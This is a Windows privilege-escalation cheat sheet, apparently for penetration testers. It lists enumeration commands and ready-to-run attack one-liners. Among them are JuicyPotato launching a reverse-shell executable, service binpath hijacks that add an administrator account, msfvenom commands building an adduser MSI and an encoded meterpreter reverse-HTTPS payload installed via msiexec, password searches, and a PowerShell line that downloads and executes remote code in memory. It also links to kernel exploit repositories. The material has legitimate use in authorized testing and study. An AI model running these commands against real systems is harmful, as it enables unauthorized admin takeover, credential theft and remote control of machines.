Windows Privilege Escalation
A collection of goodies, one-liners, and to-dos to keep in your back pocket!
System
Check for goodies in environment variables
set
Get OS and architecture
systeminfo
systeminfo | findstr /B /C:"Host Name" /C:"OS Name" /C:"OS Version" /C:"System Type"
View recent KBs installed
wmic qfe
wmic qfe get Caption,Description,HotFixID,InstalledOn
wmic qfe list full
Local storage
wmic logicaldisk get caption,description,providername
Get .NET Framework versions (winPEAS binary pre-req)
reg query "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\full" /v version
dir /b /ad /o-n %systemroot%\\[Microsoft.NET](<http://microsoft.net/>)\\Framework\\v?.*
- Enable RDP Access
Users
Get your user
whoami
Get your privileges
whoami /priv
Get your groups
whoami /groups
View other users
net user
net user <username>
View local groups
net localgroup
(may not work without logon session, have to specify group)
net localgroup administrators
List scheduled tasks
schtasks /query /fo LIST /v
Network
Get IP addresses
ipconfig /all
Get ARP table
arp -a
Get route table
route print
See what ports are listening, who we are communicating wtih
netstat -ano
Passwords
Search current directory for certain files containing "password"
findstr /si password *.txt *.ini *.config
Search for files that contain password in filename
dir /s *password*
Firewall / AntiVirus
Check for firewall settings
netsh firewall show state
netsh firewall show config
Get antivirus
wmic /node:localhost /namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName
- Bypass Anti-Virus with Hyperion
Services
Check for running services
net start
wmic service list brief
Check for installed drivers
DRIVERQUERY
Link running processes to services
tasklist /SVC
Get permission string for all services
sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @sc sdshow %i & @echo ---------) & del a 2>nul & del b 2>nul
- Windows XP? You can probably exploit
upnphost
Impersonation
whomai /privs
Have SeImpersonate or SeAssignPrimaryToken?
You must find a CLSID here: http://ohpe.it/juicy-potato/CLSID/
JuicyPotato.exe -l 1340 -p C:\\users\\User\\rev.exe -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
Unquoted Service Paths
Find unquoted binary paths in services
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\\Windows\\\\" |findstr /i /v """
Check permissions, can we write to the directory we want and start/stop service?
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
icacls [Directory]
sc stop [service] && sc start [service]
Edit binary path
sc config [service] binpath="malicious exe path
sc stop [service]
sc start [service]
If we don't want to redirect to a reverse shell exe we can make a new user instead
sc config [service] binpath="net user admin password /add"
AlwaysInstallElevated
Check if enabled
reg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated
reg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated
Create msi payload
msfvenom -p windows/adduser USER=admin PASS=password -f msi -o filename.msi
msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai LHOST=[LHOST IP] LPORT=443 -f msi -o filename.msi
Install elevated payload
msiexec /quiet /qn /i C:\\Users\\filename.msi
Unattended Installs
Check for unattended install files. May contain base64 encoded passwords for local admin accounts.
C:\\Windows\\Panther\\
C:\\Windows\\Panther\\Unattend\\
C:\\Windows\\System32\\
C:\\Windows\\System32\\sysprep\\
Unattend.xml
unattended.xml
unattend.txt
sysprep.xml
sysprep.inf
PowerShell
Run something without ever touching the disk
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('<http://blah/blah.exe>'); Invoke-AllChecks"
Common Exploits
Here's a list of some common exploits leading to investigate when looking at privilege escalation.
Windows Vista/7 – Elevation of Privileges (UAC Bypass)
Microsoft Windows 7 SP1 (x86) – ‘WebDAV’ Privilege Escalation (MS16-016)
Microsoft Windows 7 SP1 (x86) – Privilege Escalation (MS16-014)
Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) – Privilege Escalation (MS16-032)
CVE-2017-0213: Windows COM Elevation of Privilege Vulnerability
- https://github.com/WindowsExploits/Exploits/tree/master/CVE-2017-0213
- https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2017-0213